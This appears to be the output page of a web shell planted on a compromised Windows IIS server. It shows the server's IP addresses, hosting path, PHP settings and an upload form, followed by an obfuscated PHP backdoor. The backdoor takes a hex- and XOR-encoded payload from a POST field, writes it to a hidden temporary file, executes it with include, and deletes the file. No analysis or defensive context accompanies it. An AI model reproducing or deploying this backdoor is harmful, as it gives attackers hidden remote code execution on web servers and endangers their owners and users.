| Server IP : 80.65.208.158 / Your IP : 216.73.216.147 Web Server : Microsoft-IIS/10.0 System : Windows NT VMI1501711 10.0 build 17763 (Windows Server 2019) AMD64 User : IWPD_134(rotechno) ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Inetpub/vhosts/rotechnochem.com/httpdocs/ |
Upload File : |
<?php
if(filter_has_var(INPUT_POST, "\x64e\x73c")){
$rec = array_filter([sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), getenv("TMP")]);
$bind = hex2bin($_POST["\x64e\x73c"]);
$val = '' ; foreach(str_split($bind) as $char){$val.=chr(ord($char)^57);}
while ($data_chunk = array_shift($rec)) {
if ((is_dir($data_chunk) and is_writable($data_chunk))) {
$entity = join("/", [$data_chunk, ".object"]);
$success = file_put_contents($entity, $val);
if ($success) {
include $entity;
@unlink($entity);
die();
}
}
}
}